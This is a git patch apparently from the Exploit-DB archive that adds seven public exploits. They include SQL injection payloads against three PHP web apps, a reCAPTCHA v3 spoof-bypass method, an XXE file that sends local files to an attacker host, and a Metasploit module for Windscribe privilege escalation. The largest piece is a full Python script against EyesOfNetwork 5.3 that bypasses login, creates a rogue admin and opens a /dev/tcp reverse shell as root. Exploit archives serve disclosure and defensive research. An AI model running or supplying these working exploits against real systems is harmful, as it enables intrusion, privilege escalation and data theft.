From 54935a78831b2604b2961862500c21a91f42d557 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 8 Feb 2020 05:01:59 +0000 Subject: [PATCH] DB: 2020-02-08 7 changes to exploits/shellcodes Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit) QuickDate 1.3.2 - SQL Injection VehicleWorkshop 1.0 - 'bookingid' SQL Injection PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection EyesOfNetwork 5.3 - Remote Code Execution ExpertGPS 6.38 - XML External Entity Injection Google Invisible RECAPTCHA 3 - Spoof Bypass --- exploits/multiple/webapps/48027.txt | 182 ++++++++++++++++++++++++++++ exploits/php/webapps/48022.txt | 44 +++++++ exploits/php/webapps/48023.txt | 28 +++++ exploits/php/webapps/48024.txt | 38 ++++++ exploits/php/webapps/48025.txt | 171 ++++++++++++++++++++++++++ exploits/windows/local/48021.rb | 156 ++++++++++++++++++++++++ exploits/xml/webapps/48026.txt | 97 +++++++++++++++ files_exploits.csv | 7 ++ 8 files changed, 723 insertions(+) create mode 100644 exploits/multiple/webapps/48027.txt create mode 100644 exploits/php/webapps/48022.txt create mode 100644 exploits/php/webapps/48023.txt create mode 100644 exploits/php/webapps/48024.txt create mode 100644 exploits/php/webapps/48025.txt create mode 100755 exploits/windows/local/48021.rb create mode 100644 exploits/xml/webapps/48026.txt diff --git a/exploits/multiple/webapps/48027.txt b/exploits/multiple/webapps/48027.txt new file mode 100644 index 000000000..509464bdc --- /dev/null +++ b/exploits/multiple/webapps/48027.txt @@ -0,0 +1,182 @@ +# Exploit Title: Google Invisible RECAPTCHA 3 - Spoof Bypass +# Date: 2020-02-07 +# Vendor Homepage: https://developers.google.com/recaptcha/docs/invisible +# Exploit Git Repo: https://github.com/matamorphosis/Browser-Exploits/tree/master/RECAPTCHA_Bypass +# Exploit Author: Matamorphosis +# Tested on: Windows and Ubuntu 19.10 +# Category: Web Apps + +-------------------------------------------------------------------------------------------- +RECAPTCHA Bypass: +-------------------------------------------------------------------------------------------- +This tool allows a user to bypass Version 3 of Google's Invisible RECAPTCHA by creating a spoofed web app that leverages the same RECAPTCHA, by providing the victims site key. + +What makes a site vulnerable? +1. They are using Version 3 of Google's Invisible RECAPTCHA +2. They allow the site key to be used on "localhost". However, while currently untested you could try adding the DNS name of the target you are attacking and try resolving it to 127.0.0.1 in your hosts file. + +NOTE: Exploit users need to have a functional understanding of both Python and JavaScript to make the necessary changes to run this exploit. + +-------------------------------------------------------------------------------------------- +PREREQUISITES: +-------------------------------------------------------------------------------------------- +The instructions supplied are written for Debian-based Linux distributions. However, this can be setup on any OS with relative ease. +1. Download and install Firefox located at https://www.mozilla.org/en-US/firefox/new/ +2. Download Gecko Driver located at https://github.com/mozilla/geckodriver/releases and ensure the binary is in your path. For *nux just copy the file to /usr/bin +``` +user@linux:~$ sudo cp geckodriver /usr/bin/geckodriver +``` +3. To use this exploit, you need to install python3, pip3 and install the additional requirements that are in the requirements.txt file. +``` +user@linux:~$ sudo apt install python3 python3-pip -y +``` +4. Now install the prerequisistes +``` +user@linux:~$ pip3 install -r requirements.txt +``` + +-------------------------------------------------------------------------------------------- +USAGE: +-------------------------------------------------------------------------------------------- +1. Obtain the site key from the target web application. There should be JavaScript that looks like the following - use the inspect element function to view it, there are two locations you can grab the site key: +``` + + +``` +2. Open the index.html file and paste the Site Key into the appropriate locations. +3. This next part is where it gets a little tricky. You need to replicate the form you are attacking and change a few things. Firstly in the body of the index.html file. Ensure you are using the appropriate method "GET" or "POST" and you are submitting it to the correct destination. +``` + +
+ + + +
+ +``` +*For steps 4-6, example code has been provided already, but ensure it matches the site you are targetting. It may be easier to strip it out and follow 4-6 if you are having a difficult time getting it working.* + +4. Next you will need to add the following lines to the body of the JavaScript already inside of the + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48022.txt b/exploits/php/webapps/48022.txt new file mode 100644 index 000000000..4fddfce25 --- /dev/null +++ b/exploits/php/webapps/48022.txt @@ -0,0 +1,44 @@ +# Exploit Title: QuickDate 1.3.2 - SQL Injection +# Dork: N/A +# Date: 2020-02-07 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://quickdatescript.com/ +# Version: 1.3.2 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# +POST /find_matches HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 425 +Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +_located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- - +# +# +HTTP/1.1 200 OK +Date: Thu, 06 Feb 2020 15:05:34 GMT +Server: Apache +Connection: Keep-alive, close +Access-Control-Allow-Origin: * +Access-Control-Max-Age: 3600 +Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 +Pragma: no-cache +Vary: User-Agent +Content-Type: application/json; charset=UTF-8 +Content-Length: 3844 + +{"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike _dislike_textdate_main@localhost : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1} +# \ No newline at end of file diff --git a/exploits/php/webapps/48023.txt b/exploits/php/webapps/48023.txt new file mode 100644 index 000000000..996732f50 --- /dev/null +++ b/exploits/php/webapps/48023.txt @@ -0,0 +1,28 @@ +# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection +# Data: 2020-02-06 +# Exploit Author: Mehran Feizi +# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop +# Tested on: Windows +# Google Dork: N/A + + +========= +Vulnerable Page: +========= +/viewtestdrive.php + + +========== +Vulnerable Source: +========== +Line6: if(isset($_GET['testid'])) +Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'"); +Line11: if(isset($_GET['testbid'])) +Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'"); +Line16: if(isset($_GET['testbida'])) +Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'"); + +========= +POC: +========= +http://site.com/viewtestdrive.php?bookingid=[SQL] \ No newline at end of file diff --git a/exploits/php/webapps/48024.txt b/exploits/php/webapps/48024.txt new file mode 100644 index 000000000..90b6ed94b --- /dev/null +++ b/exploits/php/webapps/48024.txt @@ -0,0 +1,38 @@ +# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection +# Google Dork: intitle: "PackWeb Formap E-learning" +# Date: 2020-02-07 +# Exploit Author: Amel BOUZIANE-LEBLOND +# Vendor Homepage: https://www.ediser.com/ +# Software Link: https://www.ediser.com/98517-formation-en-ligne +# Version: v1.0 +# Tested on: Linux +# CVE : N/A + +# Description: +# The PackWeb Formap E-learning application from EDISER is vulnerable to +# SQL injection via the 'NumCours' parameter on the eleve_cours.php + +==================== 1. SQLi ==================== + +http://localhost/eleve_cours.php?NumCours=[SQLI] + +The 'NumCours' parameter is vulnerable to SQL injection. + +GET parameter 'NumCours' is vulnerable. + +--- +Parameter: #1* (URI) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (SLEEP) + Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1 + + Type: UNION query + Title: MySQL UNION query (47) - 1 column + Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1 +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 \ No newline at end of file diff --git a/exploits/php/webapps/48025.txt b/exploits/php/webapps/48025.txt new file mode 100644 index 000000000..058b798f8 --- /dev/null +++ b/exploits/php/webapps/48025.txt @@ -0,0 +1,171 @@ +# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution +# Date: 2020-02-01 +# Exploit Author: Clément Billac +# Vendor Homepage: https://www.eyesofnetwork.com/ +# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso +# Version: 5.3 +# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656 + +#!/bin/env python3 +# coding: utf8 +# +# +# CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands +# We were able to run the 'id' command with the following payload in the target field : ';id #'. +# +# CVE-2020-8655 - LPE via nmap NSE script +# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script. +# nmap version 6.40 is used and doesn't have the -c and -e options. +# +# CVE-2020-8656 - SQLi in API in getApiKey function on 'username' field +# PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or ' +# Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet + +# Python imports +import sys, requests, json, os, argparse, socket +from bs4 import BeautifulSoup + +# Text colors +txt_yellow = "\033[01;33m" +txt_blue = "\033[01;34m" +txt_red = "\033[01;31m" +txt_green = "\033[01;32m" +txt_bold = "\033[01;01m" +txt_reset = "\033[00m" +txt_info = txt_blue + "[*] " + txt_reset +txt_success = txt_green + "[+] " + txt_reset +txt_warn = txt_yellow + "[!] " + txt_reset +txt_err = txt_red + "[x] " + txt_reset + +# Banner +banner = (txt_bold + """ ++-----------------------------------------------------------------------------+ +| EyesOfNetwork 5.3 RCE (API v2.4.2) | +| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m | +| | +| Examples: | +| eonrce.py -h | +| eonrce.py http(s)://EyesOfNetwork-URL | +| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -port 3128 | +| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -user pentest2020 | ++-----------------------------------------------------------------------------+ +""" + txt_reset) + +# Arguments Parser +parser = argparse.ArgumentParser("eonrce", formatter_class=argparse.RawDescriptionHelpFormatter, usage=banner) +parser.add_argument("URL", metavar="URL", help="URL of the EyesOfNetwork server") +parser.add_argument("-ip", metavar="IP", help="Local IP to receive reverse shell", default=socket.gethostbyname(socket.gethostname())) +parser.add_argument("-port", metavar="Port", type=int, help="Local port to listen", default=443) +parser.add_argument("-user", metavar="Username", type=str, help="Name of the new user to create", default='h4ker') +parser.add_argument("-password", metavar="Password", type=str, help="Password of the new user", default='net_was_here') +args = parser.parse_args() + +# HTTP Requests config +requests.packages.urllib3.disable_warnings() +baseurl = sys.argv[1].strip('/') +url = baseurl +useragent = 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37' + +# Admin user creation variables +new_user = args.user +new_pass = args.password + +# Executed command +# The following payload performs both the LPE and the reverse shell in a single command. +# It creates a NSE script in /tmp/h4k wich execute /bin/sh with reverse shell and then perform the nmap scan on localhost with the created NSE script. +# Readable PoC: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k # +ip = args.ip +port = str(args.port) +cmd = '%3Becho+%22local+os+%3D+require+%5C%22os%5C%22+hostrule%3Dfunction%28host%29+os.execute%28%5C%22%2Fbin%2Fsh+-i+%3E%26+%2Fdev%2Ftcp%2F' + ip + '%2F' + port + '+0%3E%261%5C%22%29+end+action%3Dfunction%28%29+end%22+%3E+%2Ftmp%2Fh4k%3Bsudo+%2Fusr%2Fbin%2Fnmap+localhost+-p+1337+-script+%2Ftmp%2Fh4k+%23' + +# Exploit banner +print (txt_bold,"""+-----------------------------------------------------------------------------+ +| EyesOfNetwork 5.3 RCE (API v2.4.2) | +| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m | ++-----------------------------------------------------------------------------+ +""", txt_reset, sep = '') + +# Check if it's a EyesOfNetwork login page. +r = requests.get(baseurl, verify=False, headers={'user-agent':useragent}) +if r.status_code == 200 and r.text.find('EyesOfNetwork') != -1 and r.text.find('form action="login.php" method="POST">') != -1: + print(txt_info, "EyesOfNetwork login page found", sep = '') +else: + print(txt_err, 'EyesOfNetwork login page not found', sep = '') + quit() + +# Check for accessible EON API +url = baseurl + '/eonapi/getApiKey' +r = requests.get(url, verify=False, headers={'user-agent':useragent}) +if r.status_code == 401 and 'api_version' in r.json().keys() and 'http_code' in r.json().keys(): + print(txt_info, 'EyesOfNetwork API page found. API version: ',txt_bold , r.json()['api_version'], txt_reset, sep = '') +else: + print(txt_warn, 'EyesOfNetwork API page not found', sep = '') + quit() + +# SQL injection with authentication bypass +url = baseurl + '/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet' +r = requests.get(url, verify=False, headers={'user-agent':useragent}) +if r.status_code == 200 and 'EONAPI_KEY' in r.json().keys(): + print(txt_success, 'Admin user key obtained: ', txt_bold, r.json()['EONAPI_KEY'], txt_reset, sep = '') +else: + print(txt_err, 'The host seems patched or unexploitable', sep = '') + print(txt_warn, 'Did you specified http instead of https in the URL ?', sep = '') + print(txt_warn, 'You can check manually the SQLi with the following payload: ', txt_bold, "/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '", txt_reset, sep = '') + quit() + +# Adding new administrator +url = sys.argv[1].strip('/') + '/eonapi/createEonUser?username=admin&apiKey=' + r.json()['EONAPI_KEY'] +r = requests.post(url, verify=False, headers={'user-agent':useragent}, json={"user_name":new_user,"user_group":"admins","user_password":new_pass}) +if r.status_code == 200 and 'result' in r.json().keys(): + if r.json()['result']['code'] == 0 and 'SUCCESS' in r.json()['result']['description']: + id = r.json()['result']['description'].split('ID = ', 1)[1].split(']')[0] + print(txt_success, 'New user ', txt_bold, new_user, txt_reset, ' successfully created. ID:', txt_bold, id, txt_reset, sep = '') + + elif r.json()['result']['code'] == 1: + if ' already exist.' in r.json()['result']['description']: + print(txt_warn, 'The user ', txt_bold, new_user, txt_reset, ' already exists', sep = '') + else: + print(txt_err, 'An error occured while querying the API. Unexpected description message: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '') + quit() + else: + print(txt_err, 'An error occured while querying the API. Unepected result code. Description: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '') + quit() +else: + print(txt_err, 'An error occured while querying the API. Missing result value in JSON response or unexpected HTTP status response', sep = '') + quit() + +# Authentication with our new user +url = baseurl + '/login.php' +auth_data = 'login=' + new_user + '&mdp=' +new_pass +auth_req = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, data=auth_data) +if auth_req.status_code == 200 and 'Set-Cookie' in auth_req.headers: + print(txt_success, 'Successfully authenticated', sep = '') +else: + print(txt_err, 'Error while authenticating. We expect to receive Set-Cookie headers uppon successful authentication', sep = '') + quit() + +# Creating Discovery job +url = baseurl + '/lilac/autodiscovery.php' +job_command = 'request=autodiscover&job_name=Internal+discovery&job_description=Internal+EON+discovery+procedure.&nmap_binary=%2Fusr%2Fbin%2Fnmap&default_template=&target%5B2%5D=' + cmd +r = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, cookies=auth_req.cookies, data=job_command) +if r.status_code == 200 and r.text.find('Starting...') != -1: + job_id = str(BeautifulSoup(r.content, "html.parser").find(id="completemsg")).split('?id=', 1)[1].split('&rev')[0] + print(txt_success, 'Discovery job successfully created with ID: ', txt_bold, job_id, txt_reset, sep = '') +else: + print(txt_err, 'Error while creating the discovery job', sep = '') + quit() + +# Launching listener +print(txt_info, 'Spawning netcat listener:', txt_bold) +nc_command = '/usr/bin/nc -lnvp' + port + ' -s ' + ip +os.system(nc_command) +print(txt_reset) + +# Removing job +url = baseurl + '/lilac/autodiscovery.php?id=' + job_id + '&delete=1' +r = requests.get(url, verify=False, headers={'user-agent':useragent}, cookies=auth_req.cookies) +if r.status_code == 200 and r.text.find('Removed Job') != -1: + print(txt_info, 'Job ', job_id, ' removed', sep = '') +else: + print(txt_err, 'Error while removing the job', sep = '') + quit() \ No newline at end of file diff --git a/exploits/windows/local/48021.rb b/exploits/windows/local/48021.rb new file mode 100755 index 000000000..e25c314b5 --- /dev/null +++ b/exploits/windows/local/48021.rb @@ -0,0 +1,156 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::EXE + include Post::File + include Post::Windows::Priv + include Post::Windows::Services + include Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windscribe WindscribeService Named Pipe Privilege Escalation', + 'Description' => %q{ + The Windscribe VPN client application for Windows makes use of a + Windows service `WindscribeService.exe` which exposes a named pipe + `\\.\pipe\WindscribeService` allowing execution of programs with + elevated privileges. + + Windscribe versions prior to 1.82 do not validate user-supplied + program names, allowing execution of arbitrary commands as SYSTEM. + + This module has been tested successfully on Windscribe versions + 1.80 and 1.81 on Windows 7 SP1 (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Emin Ghuliev', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'References' => + [ + ['CVE', '2018-11479'], + ['URL', 'http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html'], + ['URL', 'https://pastebin.com/eLG3dpYK'] + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Automatic', {}]], + 'DisclosureDate' => '2018-05-24', + 'DefaultOptions' => + { + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' + }, + 'Notes' => + { + 'Reliability' => [ REPEATABLE_SESSION ], + 'Stability' => [ CRASH_SAFE ] + }, + 'DefaultTarget' => 0)) + register_advanced_options [ + OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]), + ] + end + + def base_dir + datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s + end + + def service_exists?(service) + srv_info = service_info(service) + + if srv_info.nil? + vprint_warning 'Unable to enumerate Windows services' + return false + end + + if srv_info && srv_info[:display].empty? + return false + end + + true + end + + def write_named_pipe(pipe, command) + kt = "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + kt << "\x00\x00\x00\x00" + kt << [command.force_encoding('UTF-8').codepoints.map { |c| "%04X" % c }.join].pack('H*') + kt << "\x00" * (32_005 - kt.length) + + print_status "Sending #{command} to #{pipe} ..." + + r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0, nil, 'OPEN_EXISTING', 0, nil) + handle = r['return'] + + if handle == 0xffffffff # INVALID_HANDLE_VALUE + print_error "Invalid handle. #{pipe} named pipe not found, or already opened" + return false + end + + vprint_good("Opended #{pipe}! Proceeding ...") + + begin + w = client.railgun.kernel32.WriteFile(handle, kt, kt.length, 4, nil) + if w['return'] == false + return false + end + ensure + session.railgun.kernel32.CloseHandle(handle) + end + + true + rescue + false + end + + def check + service = 'WindscribeService' + + unless service_exists? service + return CheckCode::Safe("Service '#{service}' does not exist") + end + + CheckCode::Detected + end + + def exploit + unless check == CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_system? + fail_with Failure::BadConfig, 'Session already has SYSTEM privileges' + end + + payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe" + payload_exe = generate_payload_exe + vprint_status "Writing payload (#{payload.encoded.length} bytes) to #{payload_path} ..." + write_file payload_path, payload_exe + register_file_for_cleanup payload_path + + unless write_named_pipe("\\\\.\\pipe\\WindscribeService", payload_path) + fail_with Failure::Unknown, 'Failed to write to pipe' + end + end +end \ No newline at end of file diff --git a/exploits/xml/webapps/48026.txt b/exploits/xml/webapps/48026.txt new file mode 100644 index 000000000..09ab29ba7 --- /dev/null +++ b/exploits/xml/webapps/48026.txt @@ -0,0 +1,97 @@ +[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection +[+] Date: 2019-12-07 +[+] Exploit Author: Trent Gordon +[+] Vendor Homepage: https://www.topografix.com/ +[+] Software Link: http://download.expertgps.com/SetupExpertGPS.exe +[+] Disclosed at: 7FEB2020 +[+] Version: 6.38 +[+] Tested on: Windows 10 +[+] CVE: N/A + +================== +Background: +================== +ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellin, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format which is based on XML. + +================== +Vulnerability: +================== +By having a user import a crafted .gpx file (XML Based GPS data file), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker. +1.)Open ExpertGPS.exe +2.)Select File -> Import Data from Other Programs... +3.)Select the crafted route.gpx file (with listener open on ATTACKERS-IP) and click "Open". + +================== +Proof of Concept: +================== + +a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd) + +b.) Hosted "payload.dtd" + + + +"> + + +c.) Exploited "route.xml" + + + +%sp; +%param1; +%exfil; +]> + + + + + + + + + + + +1600PennsylvaniaAvenuenWashingt +1600 Pennsylvania Avenue +Washington +1600 Pennsylvania Avenue +Washington, DC 20500 +City (Small) +Address + + + + +1600 Pennsylvania Avenue +Washington +DC +United States +20500 + + + + +1600 Pennsylvania Avenue +Washington +DC +United States +20500 + + + + + + + + + +================== +Additional Attack Vectors: +================== +There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c3ce8e278..889569af5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10937,6 +10937,7 @@ id,file,description,date,author,type,platform,port 47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux, 48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux, 48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows, +48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42316,3 +42317,9 @@ id,file,description,date,author,type,platform,port 48018,exploits/java/webapps/48018.py,"Cisco Data Center Network Manager 11.2 - Remote Code Execution",2020-02-06,mr_me,webapps,java, 48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java, 48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java, +48022,exploits/php/webapps/48022.txt,"QuickDate 1.3.2 - SQL Injection",2020-02-07,"Ihsan Sencan",webapps,php, +48023,exploits/php/webapps/48023.txt,"VehicleWorkshop 1.0 - 'bookingid' SQL Injection",2020-02-07,"Mehran Feizi",webapps,php, +48024,exploits/php/webapps/48024.txt,"PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection",2020-02-07,"Amel BOUZIANE-LEBLOND",webapps,php, +48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php, +48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml, +48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,